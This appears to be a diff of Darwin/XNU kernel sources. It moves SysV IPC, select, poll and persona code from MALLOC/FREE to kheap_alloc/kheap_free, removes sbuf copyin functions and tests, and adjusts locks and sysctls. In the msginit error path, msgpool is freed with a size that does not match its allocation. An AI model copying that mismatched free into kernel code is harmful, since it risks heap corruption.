-       switch (copyinstr(CAST_USER_ADDR_T(uaddr), &s->s_buf[s->s_len], len + 1, &done)) {
-       case ENAMETOOLONG:
-               SBUF_SETFLAG(s, SBUF_OVERFLOWED);
-               s->s_len += done;
-               return -1;
-       case 0:
-               s->s_len += done - 1;
-               break;
-       default:
-               return -1;
-       }
-
-       return (int)done;
-}
-
 #if DEBUG || DEVELOPMENT
 
 /*
@@ -1932,258 +1791,6 @@ sysctl_sbuf_tests SYSCTL_HANDLER_ARGS
                }
        }
 
-       SBUF_TESTING("sbuf_uionew")
-       {
-               SBUF_SHOULD("reject residuals that are too large")
-               {
-                       struct sbuf *s = NULL;
-                       uio_t auio = NULL;
-                       char buf[4];
-                       int error = 0;
-
-                       buf[0] = 'A';
-                       buf[1] = 'B';
-                       buf[2] = 'C';
-                       buf[3] = 'D';
-
-                       auio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ);
-                       uio_addiov(auio, (user_addr_t)buf, INT_MAX);
-
-                       s = sbuf_uionew(NULL, auio, &error);
-                       SBUF_ASSERT_EQ(NULL, s);
-                       SBUF_ASSERT_EQ(EINVAL, error);
-
-                       uio_free(auio);
-               }
-
-               SBUF_SHOULD("initialize using data described by the uio")
-               {
-                       struct sbuf *s = NULL;
-                       uio_t auio = NULL;
-                       char buf[4];
-                       int error = 0;
-
-                       buf[0] = 'A';
-                       buf[1] = 'B';
-                       buf[2] = 'C';
-                       buf[3] = 'D';
-
-                       auio = uio_create(1, 0, UIO_SYSSPACE, UIO_WRITE);
-                       uio_addiov(auio, (user_addr_t)buf, sizeof(buf));
-
-                       s = sbuf_uionew(NULL, auio, &error);
-                       SBUF_ASSERT_NE(NULL, s);
-                       SBUF_ASSERT_EQ(0, error);
-                       SBUF_ASSERT_EQ(4, s->s_len);
-                       SBUF_ASSERT_EQ('A', s->s_buf[0]);
-                       SBUF_ASSERT_EQ('B', s->s_buf[1]);
-                       SBUF_ASSERT_EQ('C', s->s_buf[2]);
-                       SBUF_ASSERT_EQ('D', s->s_buf[3]);
-
-                       sbuf_delete(s);
-                       uio_free(auio);
-               }
-
-               SBUF_SHOULD("fail gracefully for bad addresses")
-               {
-                       struct sbuf *s = NULL;
-                       uio_t auio = NULL;
-                       int error = 0;
-
-                       auio = uio_create(1, 0, UIO_USERSPACE, UIO_WRITE);
-                       uio_addiov(auio, (user_addr_t)0xdeadUL, 123);
-
-                       s = sbuf_uionew(NULL, auio, &error);
-                       SBUF_ASSERT_EQ(NULL, s);
-                       SBUF_ASSERT_NE(0, error);
-
-                       uio_free(auio);
-               }
-       }
-
-       SBUF_TESTING("sbuf_bcopyin")
-       {
-               SBUF_SHOULD("succeed when len is zero")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, 0));
-                       SBUF_ASSERT_EQ(0, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("succeed in the simple case")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-                       size_t ulen = req->newlen;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(ulen, (size_t)s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail for invalid userland addresses")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)0xdeadUL;
-                       size_t ulen = req->newlen;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(0, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail for kernel addresses")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = "abcd";
-                       size_t ulen = 4;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(0, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail if we don't have capacity for a fixed-len sbuf")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-                       size_t ulen = req->newlen;
-                       int len_before;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_FIXEDLEN);
-                       SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde"));
-                       len_before = s->s_len;
-                       SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(len_before, s->s_len);
-                       SBUF_ASSERT(SBUF_ISSET(s, SBUF_OVERFLOWED));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("auto-extend if we don't have capacity for an auto-extend sbuf")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-                       size_t ulen = req->newlen;
-                       int len_before;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde"));
-                       len_before = s->s_len;
-                       SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(len_before + (int)ulen, s->s_len);
-                       SBUF_ASSERT_NOT(SBUF_ISSET(s, SBUF_OVERFLOWED));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail if overflowed")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-                       size_t ulen = req->newlen;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_SETFLAG(s, SBUF_OVERFLOWED);
-                       SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen));
-
-                       sbuf_delete(s);
-               }
-       }
-
-       SBUF_TESTING("sbuf_copyin")
-       {
-               SBUF_SHOULD("succeed in the simple case")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(req->newlen + 1, sbuf_copyin(s, (const void *)req->newptr, req->newlen));
-                       SBUF_ASSERT_EQ(req->newlen, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("use the sbuf capacity if len is zero")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(req->newlen + 1, sbuf_copyin(s, (const void *)req->newptr, 0));
-                       SBUF_ASSERT_EQ(req->newlen, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail if we can't extend the sbuf to accommodate")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_FIXEDLEN);
-                       SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde"));
-                       SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("auto-extend the buffer if necessary")
-               {
-                       struct sbuf *s = NULL;
-                       int len_before;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde"));
-                       len_before = s->s_len;
-                       SBUF_ASSERT_NE(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen));
-                       SBUF_ASSERT_GT(len_before, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail if the sbuf is overflowed")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_SETFLAG(s, SBUF_OVERFLOWED);
-                       SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail gracefully for an invalid address")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (void *)0xdeadUL, req->newlen));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail gracefully for a kernel address")
-               {
-                       struct sbuf *s = NULL;
-                       const char *ptr = "abcd";
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(-1, sbuf_copyin(s, ptr, strlen(ptr)));
-
-                       sbuf_delete(s);
-               }
-       }
-
        SBUF_TEST_END;
 }
 
index 77b32e3d47405bce68a3c2cd6c1ffd5fd7562aaf..1d88f75a81ce811fde65f7977e631e6c93065793 100644 (file)
 
 /* for entitlement check */
 #include <IOKit/IOBSD.h>
+/*
+ * If you need accounting for KM_SELECT consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_SELECT       KHEAP_DEFAULT
 
 /* XXX should be in a header file somewhere */
 extern kern_return_t IOBSDGetPlatformUUID(__darwin_uuid_t uuid, mach_timespec_t timeoutp);
@@ -1210,6 +1215,36 @@ pselect_nocancel(struct proc *p, struct pselect_nocancel_args *uap, int32_t *ret
        return err;
 }
 
+void
+select_cleanup_uthread(struct _select *sel)
+{
+       kheap_free(KHEAP_DATA_BUFFERS, sel->ibits, 2 * sel->nbytes);
+       sel->ibits = sel->obits = NULL;
+       sel->nbytes = 0;
+}
+
+static int
+select_grow_uthread_cache(struct _select *sel, uint32_t nbytes)
+{
+       uint32_t *buf;
+
+       buf = kheap_alloc(KHEAP_DATA_BUFFERS, 2 * nbytes, Z_WAITOK | Z_ZERO);
+       if (buf) {
+               select_cleanup_uthread(sel);
+               sel->ibits = buf;
+               sel->obits = buf + nbytes / sizeof(uint32_t);
+               sel->nbytes = nbytes;
+               return true;
+       }
+       return false;
+}
+
+static void
+select_bzero_uthread_cache(struct _select *sel)
+{
+       bzero(sel->ibits, sel->nbytes * 2);
+}
+
 /*
  * Generic implementation of {,p}select. Care: we type-pun uap across the two
  * syscalls, which differ slightly. The first 4 arguments (nfds and the fd sets)
@@ -1226,7 +1261,6 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo
        struct uthread  *uth;
        struct _select *sel;
        struct _select_data *seldata;
-       int needzerofill = 1;
        int count = 0;
        size_t sz = 0;
 
@@ -1266,35 +1300,11 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo
         * it is not a POSIX compliant error code for select().
         */
        if (sel->nbytes < (3 * ni)) {
-               int nbytes = 3 * ni;
-
-               /* Free previous allocation, if any */
-               if (sel->ibits != NULL) {
-                       FREE(sel->ibits, M_TEMP);
-               }
-               if (sel->obits != NULL) {
-                       FREE(sel->obits, M_TEMP);
-                       /* NULL out; subsequent ibits allocation may fail */
-                       sel->obits = NULL;
-               }
-
-               MALLOC(sel->ibits, u_int32_t *, nbytes, M_TEMP, M_WAITOK | M_ZERO);
-               if (sel->ibits == NULL) {
-                       return EAGAIN;
-               }
-               MALLOC(sel->obits, u_int32_t *, nbytes, M_TEMP, M_WAITOK | M_ZERO);
-               if (sel->obits == NULL) {
-                       FREE(sel->ibits, M_TEMP);
-                       sel->ibits = NULL;
+               if (!select_grow_uthread_cache(sel, 3 * ni)) {
                        return EAGAIN;
                }
-               sel->nbytes = nbytes;
-               needzerofill = 0;
-       }
-
-       if (needzerofill) {
-               bzero((caddr_t)sel->ibits, sel->nbytes);
-               bzero((caddr_t)sel->obits, sel->nbytes);
+       } else {
+               select_bzero_uthread_cache(sel);
        }
 
        /*
@@ -1347,14 +1357,14 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo
                        if (waitq_set_is_valid(uth->uu_wqset)) {
                                waitq_set_deinit(uth->uu_wqset);
                        }
-                       FREE(uth->uu_wqset, M_SELECT);
+                       kheap_free(KM_SELECT, uth->uu_wqset, uth->uu_wqstate_sz);
                } else if (uth->uu_wqstate_sz && !uth->uu_wqset) {
                        panic("select: thread structure corrupt! "
                            "uu_wqstate_sz:%ld, wqstate_buf == NULL",
                            uth->uu_wqstate_sz);
                }
                uth->uu_wqstate_sz = sz;
-               MALLOC(uth->uu_wqset, struct waitq_set *, sz, M_SELECT, M_WAITOK);
+               uth->uu_wqset = kheap_alloc(KM_SELECT, sz, Z_WAITOK);
                if (!uth->uu_wqset) {
                        panic("can't allocate %ld bytes for wqstate buffer",
                            uth->uu_wqstate_sz);
@@ -1834,6 +1844,7 @@ poll_nocancel(struct proc *p, struct poll_nocancel_args *uap, int32_t *retval)
        u_int nfds = uap->nfds;
        u_int rfds = 0;
        rlim_t nofile = proc_limitgetcur(p, RLIMIT_NOFILE, TRUE);
+       size_t ni = nfds * sizeof(struct pollfd);
 
        /*
         * This is kinda bogus.  We have fd limits, but that is not
@@ -1853,8 +1864,7 @@ poll_nocancel(struct proc *p, struct poll_nocancel_args *uap, int32_t *retval)
        }
 
        if (nfds) {
-               size_t ni = nfds * sizeof(struct pollfd);
-               MALLOC(fds, struct pollfd *, ni, M_TEMP, M_WAITOK);
+               fds = kheap_alloc(KHEAP_TEMP, ni, Z_WAITOK);
                if (NULL == fds) {
                        error = EAGAIN;
                        goto out;
@@ -1979,9 +1989,7 @@ done:
        }
 
 out:
-       if (NULL != fds) {
-               FREE(fds, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, fds, ni);
 
        kqueue_dealloc(kq);
        return error;
@@ -3231,15 +3239,21 @@ SYSCTL_PROC(_machdep_remotetime, OID_AUTO, conversion_params,
 #endif /* CONFIG_MACH_BRIDGE_RECV_TIME */
 
 #if DEVELOPMENT || DEBUG
-#if __AMP__
+
 #include <pexpert/pexpert.h>
 extern int32_t sysctl_get_bound_cpuid(void);
-extern void sysctl_thread_bind_cpuid(int32_t cpuid);
+extern kern_return_t sysctl_thread_bind_cpuid(int32_t cpuid);
 static int
 sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS
 {
 #pragma unused(oidp, arg1, arg2)
 
+       /*
+        * DO NOT remove this bootarg guard or make this non-development.
+        * This kind of binding should only be used for tests and
+        * experiments in a custom configuration, never shipping code.
+        */
+
        if (!PE_parse_boot_argn("enable_skstb", NULL, 0)) {
                return ENOENT;
        }
@@ -3254,7 +3268,15 @@ sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS
        }
 
        if (changed) {
-               sysctl_thread_bind_cpuid(new_value);
+               kern_return_t kr = sysctl_thread_bind_cpuid(new_value);
+
+               if (kr == KERN_NOT_SUPPORTED) {
+                       return ENOTSUP;
+               }
+
+               if (kr == KERN_INVALID_VALUE) {
+                       return ERANGE;
+               }
        }
 
        return error;
@@ -3263,6 +3285,7 @@ sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS
 SYSCTL_PROC(_kern, OID_AUTO, sched_thread_bind_cpu, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_LOCKED,
     0, 0, sysctl_kern_sched_thread_bind_cpu, "I", "");
 
+#if __AMP__
 extern char sysctl_get_bound_cluster_type(void);
 extern void sysctl_thread_bind_cluster_type(char cluster_type);
 static int
@@ -3404,6 +3427,12 @@ SYSCTL_INT(_kern, OID_AUTO, sched_edge_migrate_ipi_immediate, CTLFLAG_RW | CTLFL
 #endif /* CONFIG_SCHED_EDGE */
 
 #endif /* __AMP__ */
+
+/* used for testing by exception_tests */
+extern uint32_t ipc_control_port_options;
+SYSCTL_INT(_kern, OID_AUTO, ipc_control_port_options,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &ipc_control_port_options, 0, "");
+
 #endif /* DEVELOPMENT || DEBUG */
 
 extern uint32_t task_exc_guard_default;
index d44ad74bfc13682c56413207d048dbb1706fb84f..2889c101961af691b31497e0e6952ab64298e8e2 100644 (file)
@@ -433,8 +433,8 @@ kpersona_find_syscall(user_addr_t infop, user_addr_t idp, user_addr_t idlenp)
        login = kinfo.persona_name[0] ? kinfo.persona_name : NULL;
 
        if (u_idlen > 0) {
-               MALLOC(persona, struct persona **, sizeof(*persona) * u_idlen,
-                   M_TEMP, M_WAITOK | M_ZERO);
+               persona = kheap_alloc(KHEAP_TEMP, sizeof(*persona) * u_idlen,
+                   Z_WAITOK | Z_ZERO);
                if (!persona) {
                        error = ENOMEM;
                        goto out;
@@ -465,7 +465,7 @@ out:
                for (size_t i = 0; i < u_idlen; i++) {
                        persona_put(persona[i]);
                }
-               FREE(persona, M_TEMP);
+               kheap_free(KHEAP_TEMP, persona, sizeof(*persona) * u_idlen);
        }
 
        (void)copyout(&k_idlen, idlenp, sizeof(u_idlen));
index 6a773e4952439dde64b565c6d31c17352fb10ff9..ed84e0ab586957c972de56cfecfa8b1a6079782e 100644 (file)
 #include <kern/assert.h>
 #include <kern/debug.h>
 
-#if OS_REASON_DEBUG
-#include <pexpert/pexpert.h>
-
-extern int os_reason_debug_disabled;
-#endif
-
 extern int maxproc;
 
 /*
@@ -52,25 +46,9 @@ static ZONE_DECLARE(os_reason_zone, "os reasons",
 
 os_refgrp_decl(static, os_reason_refgrp, "os_reason", NULL);
 
-#define OS_REASON_RESERVE_COUNT 100
-
 static int os_reason_alloc_buffer_internal(os_reason_t cur_reason, uint32_t osr_bufsize,
     zalloc_flags_t flags);
 
-void
-os_reason_init(void)
-{
-       int reasons_allocated = 0;
-
-       /*
-        * We pre-fill the OS reason zone to reduce the likelihood that
-        * the jetsam thread and others block when they create an exit
-        * reason.
-        */
-       reasons_allocated = zfill(os_reason_zone, OS_REASON_RESERVE_COUNT);
-       assert(reasons_allocated >= OS_REASON_RESERVE_COUNT);
-}
-
 /*
  * Creates a new reason and initializes it with the provided reason
  * namespace and code. Also sets up the buffer and kcdata_descriptor
index c2802385f84be77091ab56eb28bf18617748c51a..3d55687cddae40b79b912750be71003a31846dbe 100644 (file)
 536    AUE_NULL        ALL     { int shared_region_map_and_slide_2_np(uint32_t files_count, const struct shared_file_np *files, uint32_t mappings_count, const struct shared_file_mapping_slide_np *mappings) NO_SYSCALL_STUB; }
 537    AUE_NULL        ALL { int pivot_root(const char *new_rootfs_path_before, const char *old_rootfs_path_after); }
 538 AUE_TASKINSPECTFORPID      ALL { int task_inspect_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); }
-539 AUE_TASKINSPECTFORPID      ALL { int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); }
+539 AUE_TASKREADFORPID ALL { int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); }
 540    AUE_PREADV      ALL     { user_ssize_t sys_preadv(int fd, struct iovec *iovp, int iovcnt, off_t offset); }
 541    AUE_PWRITEV     ALL     { user_ssize_t sys_pwritev(int fd, struct iovec *iovp, int iovcnt, off_t offset); }
 542    AUE_PREADV      ALL     { user_ssize_t sys_preadv_nocancel(int fd, struct iovec *iovp, int iovcnt, off_t offset) NO_SYSCALL_STUB; }
index 5769cf276851aa1f434374319be7b62d219e1d43..afddde8c280ddc1175635dac66e7caa43267c3d4 100644 (file)
@@ -103,17 +103,12 @@ struct msgmap           *msgmaps;       /* MSGSEG msgmap structures */
 struct msg              *msghdrs;       /* MSGTQL msg headers */
 struct msqid_kernel     *msqids;        /* MSGMNI msqid_kernel structs (wrapping user_msqid_ds structs) */
 
-static lck_grp_t       *sysv_msg_subsys_lck_grp;
-static lck_grp_attr_t  *sysv_msg_subsys_lck_grp_attr;
-static lck_attr_t      *sysv_msg_subsys_lck_attr;
-static lck_mtx_t        sysv_msg_subsys_mutex;
+static LCK_GRP_DECLARE(sysv_msg_subsys_lck_grp, "sysv_msg_subsys_lock");
+static LCK_MTX_DECLARE(sysv_msg_subsys_mutex, &sysv_msg_subsys_lck_grp);
 
 #define SYSV_MSG_SUBSYS_LOCK() lck_mtx_lock(&sysv_msg_subsys_mutex)
 #define SYSV_MSG_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_msg_subsys_mutex)
 
-void sysv_msg_lock_init(void);
-
-
 #ifdef __APPLE_API_PRIVATE
 int     msgmax,                 /* max chars in a message */
     msgmni,                     /* max message queue identifiers */
@@ -131,18 +126,6 @@ struct msginfo msginfo = {
 };
 #endif /* __APPLE_API_PRIVATE */
 
-/* Initialize the mutex governing access to the SysV msg subsystem */
-__private_extern__ void
-sysv_msg_lock_init( void )
-{
-       sysv_msg_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       sysv_msg_subsys_lck_grp = lck_grp_alloc_init("sysv_msg_subsys_lock", sysv_msg_subsys_lck_grp_attr);
-
-       sysv_msg_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&sysv_msg_subsys_mutex, sysv_msg_subsys_lck_grp, sysv_msg_subsys_lck_attr);
-}
-
 static __inline__ user_time_t
 sysv_msgtime(void)
 {
@@ -252,30 +235,27 @@ msginit(__unused void *dummy)
         * if this fails, fail safely and leave it uninitialized (related
         * system calls will fail).
         */
-       msgpool = (char *)_MALLOC(msginfo.msgmax, M_SHM, M_WAITOK);
+       msgpool = kheap_alloc(KHEAP_DATA_BUFFERS, msginfo.msgmax, Z_WAITOK);
        if (msgpool == NULL) {
                printf("msginit: can't allocate msgpool");
                goto bad;
        }
-       MALLOC(msgmaps, struct msgmap *,
-           sizeof(struct msgmap) * msginfo.msgseg,
-           M_SHM, M_WAITOK);
+       msgmaps = kheap_alloc(KM_SHM, sizeof(struct msgmap) * msginfo.msgseg,
+           Z_WAITOK);
        if (msgmaps == NULL) {
                printf("msginit: can't allocate msgmaps");
                goto bad;
        }
 
-       MALLOC(msghdrs, struct msg *,
-           sizeof(struct msg) * msginfo.msgtql,
-           M_SHM, M_WAITOK);
+       msghdrs = kheap_alloc(KM_SHM, sizeof(struct msg) * msginfo.msgtql,
+           Z_WAITOK);
        if (msghdrs == NULL) {
                printf("msginit: can't allocate msghdrs");
                goto bad;
        }
 
-       MALLOC(msqids, struct msqid_kernel *,
-           sizeof(struct msqid_kernel) * msginfo.msgmni,
-           M_SHM, M_WAITOK);
+       msqids = kheap_alloc(KM_SHM,
+           sizeof(struct msqid_kernel) * msginfo.msgmni, Z_WAITOK);
        if (msqids == NULL) {
                printf("msginit: can't allocate msqids");
                goto bad;
@@ -319,18 +299,14 @@ msginit(__unused void *dummy)
        initted = 1;
 bad:
        if (!initted) {
-               if (msgpool != NULL) {
-                       _FREE(msgpool, M_SHM);
-               }
-               if (msgmaps != NULL) {
-                       FREE(msgmaps, M_SHM);
-               }
-               if (msghdrs != NULL) {
-                       FREE(msghdrs, M_SHM);
-               }
-               if (msqids != NULL) {
-                       FREE(msqids, M_SHM);
-               }
+               kheap_free(KHEAP_DATA_BUFFERS, msgpool,
+                   sizeof(struct msgmap) * msginfo.msgseg);
+               kheap_free(KM_SHM, msgmaps,
+                   sizeof(struct msgmap) * msginfo.msgseg);
+               kheap_free(KM_SHM, msghdrs,
+                   sizeof(struct msg) * msginfo.msgtql);
+               kheap_free(KM_SHM, msqids,
+                   sizeof(struct msqid_kernel) * msginfo.msgmni);
        }
        return initted;
 }
@@ -1467,12 +1443,11 @@ msgrcv_nocancel(struct proc *p, struct msgrcv_nocancel_args *uap, user_ssize_t *
        for (len = 0; len < msgsz; len += msginfo.msgssz) {
                size_t tlen;
 
-               /* compare input (size_t) value against restrict (int) value */
-               if (msgsz > (size_t)msginfo.msgssz) {
-                       tlen = msginfo.msgssz;
-               } else {
-                       tlen = msgsz;
-               }
+               /*
+                * copy the full segment, or less if we're at the end
+                * of the message
+                */
+               tlen = MIN(msgsz - len, (size_t)msginfo.msgssz);
                if (next <= -1) {
                        panic("next too low #3");
                }
index cf284cd821d4d28b8ab97cd7e6f8f638d2b9fe0c..f7ab8e39cd569b6a4ed34b9efe312d13c45bf597 100644 (file)
@@ -78,7 +78,7 @@
 #define MPRINTF(a)
 #endif
 
-#define M_SYSVSEM       M_TEMP
+#define KM_SYSVSEM       KHEAP_DEFAULT
 
 
 /* Hard system limits to avoid resource starvation / DOS attacks.
@@ -133,27 +133,12 @@ static int              semu_list_idx = -1;     /* active undo structures */
 struct sem_undo         *semu = NULL;           /* semaphore undo pool */
 
 
-void sysv_sem_lock_init(void);
-static lck_grp_t       *sysv_sem_subsys_lck_grp;
-static lck_grp_attr_t  *sysv_sem_subsys_lck_grp_attr;
-static lck_attr_t      *sysv_sem_subsys_lck_attr;
-static lck_mtx_t        sysv_sem_subsys_mutex;
+static LCK_GRP_DECLARE(sysv_sem_subsys_lck_grp, "sysv_sem_subsys_lock");
+static LCK_MTX_DECLARE(sysv_sem_subsys_mutex, &sysv_sem_subsys_lck_grp);
 
 #define SYSV_SEM_SUBSYS_LOCK() lck_mtx_lock(&sysv_sem_subsys_mutex)
 #define SYSV_SEM_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_sem_subsys_mutex)
 
-
-__private_extern__ void
-sysv_sem_lock_init( void )
-{
-       sysv_sem_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       sysv_sem_subsys_lck_grp = lck_grp_alloc_init("sysv_sem_subsys_lock", sysv_sem_subsys_lck_grp_attr);
-
-       sysv_sem_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&sysv_sem_subsys_mutex, sysv_sem_subsys_lck_grp, sysv_sem_subsys_lck_attr);
-}
-
 static __inline__ user_time_t
 sysv_semtime(void)
 {
@@ -283,8 +268,8 @@ grow_semu_array(int newSize)
 #ifdef SEM_DEBUG
        printf("growing semu[] from %d to %d\n", seminfo.semmnu, newSize);
 #endif
-       MALLOC(newSemu, struct sem_undo *, sizeof(struct sem_undo) * newSize,
-           M_SYSVSEM, M_WAITOK | M_ZERO);
+       newSemu = kheap_alloc(KM_SYSVSEM, sizeof(struct sem_undo) * newSize,
+           Z_WAITOK | Z_ZERO);
        if (NULL == newSemu) {
 #ifdef SEM_DEBUG
                printf("allocation failed.  no changes made.\n");
@@ -298,14 +283,12 @@ grow_semu_array(int newSize)
        }
        /*
         * The new elements (from newSemu[i] to newSemu[newSize-1]) have their
-        * "un_proc" set to 0 (i.e. NULL) by the M_ZERO flag to MALLOC() above,
-        * so they're already marked as "not in use".
+        * "un_proc" set to 0 (i.e. NULL) by the Z_ZERO flag to kheap_alloc
+        * above, so they're already marked as "not in use".
         */
 
        /* Clean up the old array */
-       if (semu) {
-               FREE(semu, M_SYSVSEM);
-       }
+       kheap_free(KM_SYSVSEM, semu, sizeof(struct sem_undo) * seminfo.semmnu);
 
        semu = newSemu;
        seminfo.semmnu = newSize;
@@ -343,9 +326,8 @@ grow_sema_array(int newSize)
 #ifdef SEM_DEBUG
        printf("growing sema[] from %d to %d\n", seminfo.semmni, newSize);
 #endif
-       MALLOC(newSema, struct semid_kernel *,
-           sizeof(struct semid_kernel) * newSize,
-           M_SYSVSEM, M_WAITOK | M_ZERO);
+       newSema = kheap_alloc(KM_SYSVSEM, sizeof(struct semid_kernel) * newSize,
+           Z_WAITOK | Z_ZERO);
        if (NULL == newSema) {
 #ifdef SEM_DEBUG
                printf("allocation failed.  no changes made.\n");
@@ -377,14 +359,13 @@ grow_sema_array(int newSize)
 
        /*
         * The new elements (from newSema[i] to newSema[newSize-1]) have their
-        * "sem_base" and "sem_perm.mode" set to 0 (i.e. NULL) by the M_ZERO
-        * flag to MALLOC() above, so they're already marked as "not in use".
+        * "sem_base" and "sem_perm.mode" set to 0 (i.e. NULL) by the Z_ZERO
+        * flag to kheap_alloc above, so they're already marked as "not in use".
         */
 
        /* Clean up the old array */
-       if (sema) {
-               FREE(sema, M_SYSVSEM);
-       }
+       kheap_free(KM_SYSVSEM, sema,
+           sizeof(struct semid_kernel) * seminfo.semmni);
 
        sema = newSema;
        seminfo.semmni = newSize;
@@ -425,8 +406,8 @@ grow_sem_pool(int new_pool_size)
 #ifdef SEM_DEBUG
        printf("growing sem_pool array from %d to %d\n", seminfo.semmns, new_pool_size);
 #endif
-       MALLOC(new_sem_pool, struct sem *, sizeof(struct sem) * new_pool_size,
-           M_SYSVSEM, M_WAITOK | M_ZERO | M_NULL);
+       new_sem_pool = kheap_alloc(KM_SYSVSEM, sizeof(struct sem) * new_pool_size,
+           Z_WAITOK | Z_ZERO);
        if (NULL == new_sem_pool) {
 #ifdef SEM_DEBUG
                printf("allocation failed.  no changes made.\n");
@@ -453,9 +434,7 @@ grow_sem_pool(int new_pool_size)
        sem_pool = new_sem_pool;
 
        /* clean up the old array */
-       if (sem_free != NULL) {
-               FREE(sem_free, M_SYSVSEM);
-       }
+       kheap_free(KM_SYSVSEM, sem_free, sizeof(struct sem) * seminfo.semmns);
 
        seminfo.semmns = new_pool_size;
 #ifdef SEM_DEBUG
@@ -606,8 +585,7 @@ semundo_adjust(struct proc *p, int *supidx, int semid,
                if (sueptr->une_adjval == 0) {
                        suptr->un_cnt--;
                        *suepptr = sueptr->une_next;
-                       FREE(sueptr, M_SYSVSEM);
-                       sueptr = NULL;
+                       kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo));
                }
                return 0;
        }
@@ -624,8 +602,7 @@ semundo_adjust(struct proc *p, int *supidx, int semid,
        }
 
        /* allocate a new semaphore undo entry */
-       MALLOC(new_sueptr, struct undo *, sizeof(struct undo),
-           M_SYSVSEM, M_WAITOK);
+       new_sueptr = kheap_alloc(KM_SYSVSEM, sizeof(struct undo), Z_WAITOK);
        if (new_sueptr == NULL) {
                return ENOMEM;
        }
@@ -662,7 +639,7 @@ semundo_clear(int semid, int semnum)
                                if (semnum == -1 || sueptr->une_num == semnum) {
